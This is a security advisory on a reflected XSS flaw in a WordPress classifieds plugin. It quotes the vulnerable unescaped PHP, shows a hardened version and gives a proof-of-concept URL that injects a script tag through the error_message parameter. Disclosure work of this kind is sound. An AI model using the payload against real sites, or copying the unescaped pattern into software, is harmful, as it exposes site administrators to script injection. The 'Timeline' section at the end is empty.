Another WordPress Classifieds Plugin 3.3.1 Reflected XSS

Homepage:

https://wordpress.org/plugins/another-wordpress-classifieds-plugin/

CVE-ID

CVE-2014-9313

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

The value of $_GET['error_message'] is interpolated into an error message without being escaped, and that message is later rendered in the plugin's admin settings page.

File: another-wordpress-classifieds-plugin\admin\admin-panel-settings.php

if ( isset( $_GET['code_error'] ) && isset( $_GET['error_message'] )  ) {
	// Vulnerable: the raw query parameter is placed in the message as-is, with no escaping.
	$errors[] = sprintf( __( 'AWPCP could not obtain a valid access token from Facebook: %s', 'AWPCP' ), $_GET['error_message'] );
} else if ( isset( $_GET['code_error'] ) ) {
	$errors[] = __( 'AWPCP could not obtain a valid access token from Facebook. Please try again.', 'AWPCP' );
}
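A hardened form of the same block, added here as an illustration and not taken from the plugin's own fix, escapes the user-controlled parameter before it is interpolated; it assumes the standard WordPress helpers wp_unslash(), sanitize_text_field() and esc_html() are available, as they are inside wp-admin:

```php
<?php
// Added example, not the plugin's own patch: the same block with the
// query parameter escaped before it can reach the page.
// Assumes WordPress is loaded, so __(), wp_unslash(),
// sanitize_text_field() and esc_html() are defined.

if ( isset( $_GET['code_error'] ) && isset( $_GET['error_message'] ) ) {
	// wp_unslash(): undo the slashes WordPress adds to superglobals.
	// sanitize_text_field(): drop tags, control characters and whitespace runs.
	// esc_html(): HTML-encode the remaining text so it is displayed, not parsed.
	$error_message = esc_html( sanitize_text_field( wp_unslash( $_GET['error_message'] ) ) );

	$errors[] = sprintf(
		__( 'AWPCP could not obtain a valid access token from Facebook: %s', 'AWPCP' ),
		$error_message
	);
} else if ( isset( $_GET['code_error'] ) ) {
	$errors[] = __( 'AWPCP could not obtain a valid access token from Facebook. Please try again.', 'AWPCP' );
}
```

Because $errors[] is rendered later, escaping at the point of output (wrapping each entry in esc_html() when it is echoed) is an equally valid fix; the point is that the parameter must be encoded before it is written into HTML.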

Proof of Concept:

The injected script executes in the browser of an authenticated administrator who opens the following URL:

http://wordpress-install/wp-admin/admin.php?page=awpcp-admin-settings&g=facebook-settings&code_error=1&error_message=<script>alert(String.fromCharCode(88,83,83));</script>

Timeline: